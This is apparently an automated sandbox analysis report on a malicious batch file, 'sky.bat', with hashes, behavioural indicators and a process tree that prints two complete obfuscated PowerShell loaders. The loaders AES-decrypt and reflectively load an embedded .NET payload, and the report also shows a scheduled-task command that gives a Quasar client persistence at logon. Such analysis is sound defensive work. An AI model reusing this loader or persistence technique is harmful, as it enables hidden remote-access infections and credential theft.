Analysis
-
max time kernel
135s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
12/01/2023, 16:32
Static task
static1
Behavioral task
behavioral1
Sample
sky.bat
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
sky.bat
Resource
win10-20220901-en
General
-
Target
sky.bat
-
Size
49KB
-
MD5
4300caa42bd8fc0c7d9ce83b19c6f1f6
-
SHA1
ed8eedc542e02a8ab749b02f161d39bb840a589c
-
SHA256
d329a265d4005b2cb8902d6148ff5e4477f2203bc2e476e51e5895f9be99c53e
-
SHA512
0ebcd250ff95b3bd8058e4bc69640afec65cf91a2745e71303edc48e6066ffa44a589bc2bd060eb54a0c9bc189169757f9a0ec292a6200090e1422db5f64ed30
-
SSDEEP
1536:WBqEwgF4HVzac6F8F2xqWa8VfXx0da57eezlV4R:1/gF41GLNxfa8VPuda57egQ
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 3100 sky.bat.exe 668 suuule.bat.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation sky.bat.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 45 api.ipify.org 46 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 400 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3100 sky.bat.exe 3100 sky.bat.exe 5108 powershell.exe 5108 powershell.exe 668 suuule.bat.exe 668 suuule.bat.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3100 sky.bat.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 668 suuule.bat.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 668 suuule.bat.exe 668 suuule.bat.exe 668 suuule.bat.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 668 suuule.bat.exe 668 suuule.bat.exe 668 suuule.bat.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 668 suuule.bat.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4324 wrote to memory of 3100 4324 cmd.exe 80 PID 4324 wrote to memory of 3100 4324 cmd.exe 80 PID 3100 wrote to memory of 460 3100 sky.bat.exe 88 PID 3100 wrote to memory of 460 3100 sky.bat.exe 88 PID 460 wrote to memory of 5108 460 cmd.exe 90 PID 460 wrote to memory of 5108 460 cmd.exe 90 PID 5108 wrote to memory of 1924 5108 powershell.exe 91 PID 5108 wrote to memory of 1924 5108 powershell.exe 91 PID 1924 wrote to memory of 668 1924 cmd.exe 94 PID 1924 wrote to memory of 668 1924 cmd.exe 94 PID 668 wrote to memory of 400 668 suuule.bat.exe 95 PID 668 wrote to memory of 400 668 suuule.bat.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Users\Admin\AppData\Local\Temp\sky.bat.exe"sky.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sky.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CeRsc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\suuule.bat"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\suuule.bat"'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\suuule.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe"suuule.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $aObMV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\suuule.bat').Split([Environment]::NewLine);foreach ($HMeAa in $aObMV) { if ($HMeAa.StartsWith(':: ')) { $jAtOW = $HMeAa.Substring(3); break; }; };$ZFFIb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jAtOW);$ufQIZ = New-Object System.Security.Cryptography.AesManaged;$ufQIZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ufQIZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ufQIZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xOjIEV/9x6H2AllyLs+AVd39m7l0oQelRu64WlIJr2c=');$ufQIZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TIb2elsPL654mr15kjK1tw==');$iHrgg = $ufQIZ.CreateDecryptor();$ZFFIb = $iHrgg.TransformFinalBlock($ZFFIb, 0, $ZFFIb.Length);$iHrgg.Dispose();$ufQIZ.Dispose();$rCpxm = New-Object System.IO.MemoryStream(, $ZFFIb);$ZoKsk = New-Object System.IO.MemoryStream;$EUWbj = New-Object System.IO.Compression.GZipStream($rCpxm, [IO.Compression.CompressionMode]::Decompress);$EUWbj.CopyTo($ZoKsk);$EUWbj.Dispose();$rCpxm.Dispose();$ZoKsk.Dispose();$ZFFIb = $ZoKsk.ToArray();$ARNYR = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ZFFIb);$BjviT = $ARNYR.EntryPoint;$BjviT.Invoke($null, (, [string[]] ('')))6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:400
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
325KB
MD52f84982ec56d82645ac61de4fb3e6e50
SHA192817fc3db66755ad189049f8e4ad3dbbaaa6db1
SHA25656aa2d6eee7f10040da74bb29c3bbe1e555547249ac4fc21e53e7d6182941e9c
SHA5122a9802c6eb9eb263b7388e6659cd424592bc151e392330ac9fb3ebf96dc1e4127db124bd412c85480247089e9db972966c735b9e049680d6200b97581135c3cd
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b